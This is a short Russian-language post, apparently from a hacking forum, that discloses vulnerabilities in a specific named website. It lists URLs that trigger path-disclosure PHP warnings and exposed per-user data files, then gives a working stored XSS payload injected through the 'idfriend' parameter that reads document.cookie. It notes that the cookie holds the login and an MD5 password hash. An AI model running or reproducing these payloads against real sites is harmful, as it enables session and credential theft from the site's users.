раскрытие путей:
http://addons.august4u.eu/top/top.php?id=11
Warning: imagecreatefromjpeg(img/logo.jpg) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /var/www/[скрыто]/top/top.php on line 35
http://addons.august4u.eu/come.php?comanda=delfriend&idfriend=999999999999
Warning: fopen(datamsg/id999999999999/friend.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 492
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999999999
Warning: fopen(datamsg/id999999999999/black.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 424
тут сохраняются файлкеки правда пустые....
http://addons.august4u.eu/datamsg/id1/friend.dat
http://addons.august4u.eu/datamsg/id1/black.dat
теперь XSS (обязательно залогинеца нада):
делаем такой запрос:
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999"><scrip t>alert(document.cookie)</script>999999
и тут смотрим результат:
http://addons.august4u.eu/index.php?comanda=friends
в куках логин и пасс(md5)...